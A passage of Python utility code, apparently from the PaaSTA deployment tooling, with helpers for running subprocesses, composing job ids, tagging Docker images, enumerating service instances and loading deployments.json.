return self.config_dict.get("default_should_run_uwsgi_exporter_sidecar", False)
def get_mark_for_deployment_max_polling_threads(self) -> int:
return self.config_dict.get("mark_for_deployment_max_polling_threads", 4)
def get_mark_for_deployment_default_polling_interval(self) -> float:
return self.config_dict.get("mark_for_deployment_default_polling_interval", 60)
def get_mark_for_deployment_default_diagnosis_interval(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_diagnosis_interval", 60
)
def get_mark_for_deployment_default_time_before_first_diagnosis(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_default_time_before_first_diagnosis", 300
)
def get_mark_for_deployment_should_ping_for_unhealthy_pods(self) -> bool:
return self.config_dict.get(
"mark_for_deployment_should_ping_for_unhealthy_pods", True
)
def get_tron_use_k8s_default(self) -> bool:
return self.config_dict.get("tron_use_k8s", False)
def get_api_profiling_config(self) -> Dict:
return self.config_dict.get(
"api_profiling_config", {"cprofile_sampling_enabled": False},
)
def get_skip_cpu_override_validation_services(self) -> List[str]:
return self.config_dict.get("skip_cpu_override_validation", [])
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
:param log: If True, the _log will be handled by _run. If set, it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output: List[str] = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
outfn: Any = print if stream else output.append
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
outfn(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
def get_umask() -> int:
"""Get the current umask for this process. NOT THREAD SAFE."""
old_umask = os.umask(0o0022)
os.umask(old_umask)
return old_umask
def get_user_agent() -> str:
base_name = os.path.basename(sys.argv[0])
if base_name == "gunicorn":
return f"{sys.argv[-1]} {paasta_tools.__version__}"
elif len(sys.argv) >= 1:
return f"{base_name} {paasta_tools.__version__}"
else:
return f"PaaSTA Tools {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
dirname = os.path.dirname(target_path)
basename = os.path.basename(target_path)
if target_path == "-":
yield sys.stdout
else:
with tempfile.NamedTemporaryFile(
dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
) as f:
temp_target_path = f.name
yield f
mode = 0o0666 & (~get_umask())
os.chmod(temp_target_path, mode)
os.rename(temp_target_path, target_path)
class InvalidJobNameError(Exception):
pass
def compose_job_id(
name: str,
instance: str,
git_hash: Optional[str] = None,
config_hash: Optional[str] = None,
spacer: str = SPACER,
) -> str:
"""Compose a job/app id by concatenating its name, instance, git hash, and config hash.
:param name: The name of the service
:param instance: The instance of the service
:param git_hash: The git_hash portion of the job_id. If git_hash is set,
config_hash must also be set.
:param config_hash: The config_hash portion of the job_id. If config_hash
is set, git_hash must also be set.
:returns: <name><SPACER><instance> if no tag, or <name><SPACER><instance><SPACER><hashes>...
if extra hash inputs are provided.
"""
composed = f"{name}{spacer}{instance}"
if git_hash and config_hash:
composed = f"{composed}{spacer}{git_hash}{spacer}{config_hash}"
elif git_hash or config_hash:
raise InvalidJobNameError(
"invalid job id because git_hash (%s) and config_hash (%s) must "
"both be defined or neither can be defined" % (git_hash, config_hash)
)
return composed
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
"""Break a composed job id into its constituent (service name, instance,
git hash, config hash) by splitting with ``spacer``.
:param job_id: The composed id of the job/app
:returns: A tuple (service name, instance, git hash, config hash) that
comprise the job_id
"""
decomposed = job_id.split(spacer)
if len(decomposed) == 2:
git_hash = None
config_hash = None
elif len(decomposed) == 4:
git_hash = decomposed[2]
config_hash = decomposed[3]
else:
raise InvalidJobNameError("invalid job id %s" % job_id)
return (decomposed[0], decomposed[1], git_hash, config_hash)
def build_docker_image_name(service: str) -> str:
"""docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
will look for your images.
:returns: a sanitized-for-Jenkins (s,/,-,g) version of the
service's path in git. E.g. For github.yelpcorp.com:services/foo the
docker image name is docker_registry/services-foo.
"""
docker_registry_url = get_service_docker_registry(service)
name = f"{docker_registry_url}/services-{service}"
return name
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
"""Builds the DOCKER_TAG string
upstream_git_commit is the SHA that we're building. Usually this is the
tip of origin/master.
"""
tag = "{}:paasta-{}".format(build_docker_image_name(service), upstream_git_commit)
return tag
def check_docker_image(service: str, tag: str) -> bool:
"""Checks whether the given image for :service: with :tag: exists.
:raises: ValueError if more than one docker image with :tag: found.
:returns: True if there is exactly one matching image found.
"""
docker_client = get_docker_client()
image_name = build_docker_image_name(service)
docker_tag = build_docker_tag(service, tag)
images = docker_client.images(name=image_name)
# image['RepoTags'] may be None
# Fixed upstream but only in docker-py 2.
# https://github.com/docker/docker-py/issues/1401
result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
if len(result) > 1:
raise ValueError(
f"More than one docker image found with tag {docker_tag}\n{result}"
)
return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
return datetime_convert_timezone(
utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
)
def datetime_convert_timezone(
dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
dt = dt.replace(tzinfo=from_zone)
converted_datetime = dt.astimezone(to_zone)
converted_datetime = converted_datetime.replace(tzinfo=None)
return converted_datetime
def get_username() -> str:
"""Returns the current username in a portable way. Will use the SUDO_USER
environment variable if present.
http://stackoverflow.com/a/2899055
"""
return os.environ.get("SUDO_USER", pwd.getpwuid(os.getuid())[0])
def get_hostname() -> str:
"""Returns the fully-qualified domain name of the server this code is
running on.
"""
return socket.getfqdn()
def get_soa_cluster_deploy_files(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
if service is None:
service = "*"
service_path = os.path.join(soa_dir, service)
valid_clusters = "|".join(load_system_paasta_config().get_clusters())
if instance_type in INSTANCE_TYPES:
instance_types = instance_type
else:
instance_types = "|".join(INSTANCE_TYPES)
search_re = r"/.*/(" + instance_types + r")-(" + valid_clusters + r")\.yaml$"
for yaml_file in glob.glob("%s/*.yaml" % service_path):
try:
with open(yaml_file):
cluster_re_match = re.search(search_re, yaml_file)
if cluster_re_match is not None:
cluster = cluster_re_match.group(2)
yield (cluster, yaml_file)
except IOError as err:
print(f"Error opening {yaml_file}: {err}")
def list_clusters(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
"""Returns a sorted list of clusters a service is configured to deploy to,
or all clusters if ``service`` is not specified.
Includes every cluster that has a ``marathon-*.yaml`` or ``tron-*.yaml`` file associated with it.
:param service: The service name. If unspecified, clusters running any service will be included.
:returns: A sorted list of cluster names
"""
clusters = set()
for cluster, _ in get_soa_cluster_deploy_files(
service=service, soa_dir=soa_dir, instance_type=instance_type
):
clusters.add(cluster)
return sorted(clusters)
def list_all_instances_for_service(
service: str,
clusters: Iterable[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
cache: bool = True,
) -> Set[str]:
instances = set()
if not clusters:
clusters = list_clusters(service, soa_dir=soa_dir)
for cluster in clusters:
if cache:
si_list = get_service_instance_list(
service, cluster, instance_type, soa_dir=soa_dir
)
else:
si_list = get_service_instance_list_no_cache(
service, cluster, instance_type, soa_dir=soa_dir
)
for service_instance in si_list:
instances.add(service_instance[1])
return instances
def filter_templates_from_config(config: Dict) -> Dict[str, Any]:
config = {
key: value for key, value in config.items() if not key.startswith("_")
} # filter templates
return config or {}
def read_service_instance_names(
service: str, instance_type: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
conf_file = f"{instance_type}-{cluster}"
config = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
config = filter_templates_from_config(config)
if instance_type == "tron":
for job_name, job in config.items():
action_names = list(job.get("actions", {}).keys())
for name in action_names:
instance = f"{job_name}.{name}"
instance_list.append((service, instance))
else:
for instance in config:
instance_list.append((service, instance))
return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
service_configuration = read_service_configuration(service, soa_dir)
return service_configuration.get("deploy", {}).get("pipeline", [])
def get_pipeline_deploy_groups(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
pipeline_steps = []
for step in get_pipeline_config(service, soa_dir):
# added support for parallel steps in a deploy.yaml
# parallel steps would break previous functionality as steps arent
# expected to be nested in a parallel block
if step.get("parallel"):
for parallel_step in step.get("parallel"):
if parallel_step.get("step"):
pipeline_steps.append(parallel_step["step"])
else:
pipeline_steps.append(step["step"])
return [step for step in pipeline_steps if is_deploy_step(step)]
def get_service_instance_list_no_cache(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
instance_types: Tuple[str, ...]
if not cluster:
cluster = load_system_paasta_config().get_cluster()
if instance_type in INSTANCE_TYPES:
instance_types = (instance_type,)
else:
instance_types = INSTANCE_TYPES
instance_list: List[Tuple[str, str]] = []
for srv_instance_type in instance_types:
instance_list.extend(
read_service_instance_names(
service=service,
instance_type=srv_instance_type,
cluster=cluster,
soa_dir=soa_dir,
)
)
log.debug("Enumerated the following instances: %s", instance_list)
return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
return get_service_instance_list_no_cache(
service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
)
def get_services_for_cluster(
cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
"""Retrieve all services and instances defined to run in a cluster.
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (service, instance)
"""
if not cluster:
cluster = load_system_paasta_config().get_cluster()
rootdir = os.path.abspath(soa_dir)
log.debug(
"Retrieving all service instance names from %s for cluster %s", rootdir, cluster
)
instance_list: List[Tuple[str, str]] = []
for srv_dir in os.listdir(rootdir):
instance_list.extend(
get_service_instance_list(srv_dir, cluster, instance_type, soa_dir)
)
return instance_list
def load_service_instance_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, InstanceConfigDict]:
conf_file = f"{instance_type}-{cluster}"
user_configs = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
user_configs = filter_templates_from_config(user_configs)
auto_configs = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
)
merged = {}
for instance_name, user_config in user_configs.items():
auto_config = auto_configs.get(instance_name, {})
merged[instance_name] = deep_merge_dictionaries(
overrides=user_config, defaults=auto_config,
)
return merged
def load_service_instance_config(
service: str,
instance: str,
instance_type: str,
cluster: str,
soa_dir: str = DEFAULT_SOA_DIR,
) -> InstanceConfigDict:
if instance.startswith("_"):
raise InvalidJobNameError(
f"Unable to load {instance_type} config for {service}.{instance} as instance name starts with '_'"
)
conf_file = f"{instance_type}-{cluster}"
# We pass deepcopy=False here and then do our own deepcopy of the subset of the data we actually care about. Without
# this optimization, any code that calls load_service_instance_config for every instance in a yaml file is ~O(n^2).
user_config = copy.deepcopy(
service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False
).get(instance)
)
if user_config is None:
raise NoConfigurationForServiceError(
f"{instance} not found in config file {soa_dir}/{service}/{conf_file}.yaml."
)
auto_config = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
).get(instance, {})
return deep_merge_dictionaries(overrides=user_config, defaults=auto_config,)
def load_service_instance_auto_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, Dict[str, Any]]:
enabled_types = load_system_paasta_config().get_auto_config_instance_types_enabled()
conf_file = f"{instance_type}-{cluster}"
if enabled_types.get(instance_type):
return service_configuration_lib.read_extra_service_information(
service,
f"{AUTO_SOACONFIG_SUBDIR}/{conf_file}",
soa_dir=soa_dir,
deepcopy=False,
)
else:
return {}
def get_docker_host() -> str:
return os.environ.get("DOCKER_HOST", "unix://var/run/docker.sock")
def get_docker_client() -> Client:
client_opts = kwargs_from_env(assert_hostname=False)
if "base_url" in client_opts:
return Client(**client_opts)
else:
return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
client = get_docker_client()
running_containers = client.containers()
return [
container
for container in running_containers
if "mesos-" in container["Names"][0]
]
class TimeoutError(Exception):
pass
class Timeout:
# From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum: int, frame: FrameType) -> None:
raise TimeoutError(self.error_message)
def __enter__(self) -> None:
self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_handler)
def print_with_indent(line: str, indent: int = 2) -> None:
"""Print a line with a given indent level"""
print(" " * indent + line)
class NoDeploymentsAvailable(Exception):
pass
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
force_bounce: Optional[str]
desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
docker_image: str
git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
v1: DeploymentsJsonV1Dict
v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
self.config_dict = config_dict
def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
full_branch = f"{service}:paasta-{branch}"
return self.config_dict.get(full_branch, {})
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, DeploymentsJsonV1)
and other.config_dict == self.config_dict
)
class DeploymentsJsonV2:
def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
self.config_dict = config_dict
self.service = service
def get_branch_dict(
self, service: str, branch: str, deploy_group: str
) -> BranchDictV2:
full_branch = f"{service}:{branch}"
branch_dict: BranchDictV2 = {
"docker_image": self.get_docker_image_for_deploy_group(deploy_group),
"git_sha": self.get_git_sha_for_deploy_group(deploy_group),
"desired_state": self.get_desired_state_for_branch(full_branch),
"force_bounce": self.get_force_bounce_for_branch(full_branch),
}
return branch_dict
def get_deploy_groups(self) -> Collection[str]:
return self.config_dict["deployments"].keys()
def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["docker_image"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["git_sha"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_desired_state_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"desired_state", "start"
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_force_bounce_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"force_bounce", None
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def load_deployments_json(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> Any:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
config_dict = json.load(f)
return (
DeploymentsJsonV1(config_dict["v1"])
if "v1" in config_dict
else DeploymentsJsonV2(service=service, config_dict=config_dict["v2"])
)
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def load_v2_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> DeploymentsJsonV2:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def get_paasta_branch(cluster: str, instance: str) -> str:
return SPACER.join((cluster, instance))
def parse_timestamp(tstamp: str) -> datetime.datetime:
return datetime.datetime.strptime(tstamp, "%Y%m%dT%H%M%S")
def format_timestamp(dt: datetime.datetime = None) -> str:
if dt is None:
dt = datetime.datetime.utcnow()
return dt.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{identifier}-{timestamp}-{desired_state}"
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{cluster}.{instance}-{timestamp}-{desired_state}"
def format_tag(tag: str) -> str:
return "refs/tags/%s" % tag
class NoDockerImageError(Exception):
pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
"""Create an MD5 hash of the configuration dictionary to be sent to
Marathon. Or anything really, so long as str(config) works. Returns
the first 8 characters so things are not really long.
:param config: The configuration to hash
:param force_bounce: a timestamp (in the form of a string) that is appended before hashing
that can be used to force a hash change
:returns: A MD5 hash of str(config)
"""
hasher = hashlib.md5()
hasher.update(
json.dumps(config, sort_keys=True).encode("UTF-8")
+ (force_bounce or "").encode("UTF-8")
)
return "config%s" % hasher.hexdigest()[:8]
def get_git_sha_from_dockerurl(docker_url: str, long: bool = False) -> str:
""" We encode the sha of the code that built a docker image *in* the docker
url. This function takes that url as input and outputs the sha.
"""
parts = docker_url.split("/")
parts = parts[-1].split("-")
sha = parts[-1]
return sha if long else sha[:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
""" code_sha is hash extracted from docker url prefixed with "git", short
hash is used because it's embedded in marathon app names and there's length
limit.
"""
try:
git_sha = get_git_sha_from_dockerurl(docker_url, long=False)
return "git%s" % git_sha
except Exception:
return "gitUNKNOWN"
def is_under_replicated(
num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
"""Calculates if something is under replicated
:param num_available: How many things are up
:param expected_count: How many things you think should be up
:param crit_threshold: Int from 0-100
:returns: Tuple of (bool, ratio)
"""
if expected_count == 0:
ratio = 100.0
else:
ratio = (num_available / float(expected_count)) * 100
if ratio < int(crit_threshold):
return (True, ratio)
else:
return (False, ratio)
def deploy_blacklist_to_constraints(
deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
"""Converts a blacklist of locations into marathon appropriate constraints.
https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator
:param blacklist: List of lists of locations to blacklist
:returns: List of lists of constraints
"""
constraints: List[Constraint] = []
for blacklisted_location in deploy_blacklist:
constraints.append([blacklisted_location[0], "UNLIKE", blacklisted_location[1]])
return constraints
def deploy_whitelist_to_constraints(
deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Converts a whitelist of locations into marathon appropriate constraints
https://mesosphere.github.io/marathon/docs/constraints.html#like-operator
:param deploy_whitelist: List of lists of locations to whitelist
:returns: List of lists of constraints
"""
if deploy_whitelist is not None:
(region_type, regions) = deploy_whitelist
regionstr = "|".join(regions)
return [[region_type, "LIKE", regionstr]]
return []
def terminal_len(text: str) -> int:
"""Return the number of characters that text will take up on a terminal. """
return len(remove_ansi_escape_sequences(text))
def format_table(
rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
"""Formats a table for use on the command line.
:param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
to be inserted verbatim. Each row (except literal strings) should be the same number of elements as
all the others.
:returns: A string containing rows formatted as a table.
"""
list_rows = [r for r in rows if not isinstance(r, str)]
# If all of the rows are strings, we have nothing to do, so short-circuit.
if not list_rows:
return cast(List[str], rows)
widths = []
for i in range(len(list_rows[0])):
widths.append(max(terminal_len(r[i]) for r in list_rows))
expanded_rows = []
for row in rows:
if isinstance(row, str):
expanded_rows.append([row])
else:
expanded_row = []
for i, cell in enumerate(row):
if i == len(row) - 1:
padding = ""
else:
padding = " " * (widths[i] - terminal_len(cell))
expanded_row.append(cell + padding)
expanded_rows.append(expanded_row)
return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)
class DuplicateKeyError(Exception):
pass
def deep_merge_dictionaries(
overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
"""
Merges two dictionaries.
"""
result = copy.deepcopy(defaults)
stack: List[Tuple[Dict, Dict]] = [(overrides, result)]
while stack:
source_dict, result_dict = stack.pop()
for key, value in source_dict.items():
try:
child = result_dict[key]
except KeyError:
result_dict[key] = value
else:
if isinstance(value, dict) and isinstance(child, dict):
stack.append((value, child))
else:
if allow_duplicate_keys:
result_dict[key] = value
else:
raise DuplicateKeyError(
f"defaults and overrides both have key {key}"
)
return result
class ZookeeperPool:
"""
A context manager that shares the same KazooClient with its children. The first nested context manager
creates and deletes the client and shares it with any of its children. This allows to place a context
manager over a large number of zookeeper calls without opening and closing a connection each time.
GIL makes this 'safe'.
"""
counter: int = 0
zk: KazooClient = None
@classmethod
def __enter__(cls) -> KazooClient:
if cls.zk is None:
cls.zk = KazooClient(
hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
)
cls.zk.start()
cls.counter = cls.counter + 1
return cls.zk
@classmethod
def __exit__(cls, *args: Any, **kwargs: Any) -> None:
cls.counter = cls.counter - 1
if cls.counter == 0:
cls.zk.stop()
cls.zk.close()
cls.zk = None
def calculate_tail_lines(verbose_level: int) -> int:
if verbose_level <= 1:
return 0
else:
return 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
"""
Returns true if the given step deploys to an instancename
Returns false if the step is a predefined step-type, e.g. itest or command-*
"""
return not (
(step in DEPLOY_PIPELINE_NON_DEPLOY_STEPS) or (step.startswith("command-"))
)
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)
def use_requests_cache(
cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
def fun_with_cache(*args: Any, **kwargs: Any) -> Any:
requests_cache.install_cache(cache_name, backend=backend, **kwargs)
result = fun(*args, **kwargs)
requests_cache.uninstall_cache()
return result
return cast(_UseRequestsCacheFuncT, fun_with_cache)
return wrap
def long_job_id_to_short_job_id(long_job_id: str) -> str:
service, instance, _, __ = decompose_job_id(long_job_id)
return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
"""
Returns the average value of an iterable
"""
return sum(iterable) / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
if not sys.stdin.isatty():
print(
"No {choosing} specified and no TTY present to ask."
"Please specify a {choosing} using the cli.".format(choosing=choosing),
file=sys.stderr,
)
sys.exit(1)
if not sequence:
print(
f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
)
sys.exit(1)
global_actions = [str("quit")]
choices = [(item, item) for item in sequence]
if len(choices) == 1:
return choices[0][0]
chooser = choice.Menu(choices=choices, global_actions=global_actions)
chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
choosing=str(choosing)
)
try:
result = chooser.ask()
except (KeyboardInterrupt, EOFError):
print("")
sys.exit(1)
if isinstance(result, tuple) and result[1] == str("quit"):
sys.exit(1)
else:
return result
def to_bytes(obj: Any) -> bytes:
if isinstance(obj, bytes):
return obj
elif isinstance(obj, str):
return obj.encode("UTF-8")
else:
return str(obj).encode("UTF-8")
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
seconds: int = 10,
error_message: str = os.strerror(errno.ETIME),
use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
if use_signals:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
def _handle_timeout(signum: int, frame: FrameType) -> None:
raise TimeoutError(error_message)
def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
else:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
# https://github.com/python/mypy/issues/797
return _Timeout(func, seconds, error_message) # type: ignore
return decorate
class _Timeout:
def __init__(
self,
function: Callable[..., _TimeoutFuncRetType],
seconds: float,
error_message: str,
) -> None:
self.seconds = seconds
self.control: queue.Queue[
Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
] = queue.Queue()
self.function = function
self.error_message = error_message
def run(self, *args: Any, **kwargs: Any) -> None:
# Try and put the result of the function into the q
# if an exception occurs then we put the exc_info instead
# so that it can be raised in the main thread.
try:
self.control.put((True, self.function(*args, **kwargs)))
except Exception:
self.control.put((False, sys.exc_info()))
def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
self.func_thread.daemon = True
self.timeout = self.seconds + time.time()
self.func_thread.start()
return self.get_and_raise()
def get_and_raise(self) -> _TimeoutFuncRetType:
while not self.timeout < time.time():
time.sleep(0.01)
if not self.func_thread.is_alive():
ret = self.control.get()
if ret[0]:
return cast(_TimeoutFuncRetType, ret[1])
else:
_, e, tb = cast(Tuple, ret[1])
raise e.with_traceback(tb)
raise TimeoutError(self.error_message)
def suggest_possibilities(
word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
suggestions = cast(
List[str],
difflib.get_close_matches(
word=word, possibilities=set(possibilities), n=max_suggestions
),
)
if len(suggestions) == 1:
return f"\nDid you mean: {suggestions[0]}?"
elif len(suggestions) >= 1:
return f"\nDid you mean one of: {', '.join(suggestions)}?"
else:
return ""
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
"""Returns a sorted list of all services"""
return sorted(os.listdir(os.path.abspath(soa_dir)))
def get_possible_launched_by_user_variable_from_env() -> str:
return os.getenv("SUDO_USER") or getpass.getuser()
def load_all_configs(
cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
config_dicts = {}
for service in os.listdir(soa_dir):
config_dicts[
service
] = service_configuration_lib.read_extra_service_information(
service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
)
return config_dicts
def ldap_user_search(
cn: str,
search_base: str,
search_ou: str,
ldap_host: str,
username: str,
password: str,
) -> Set[str]:
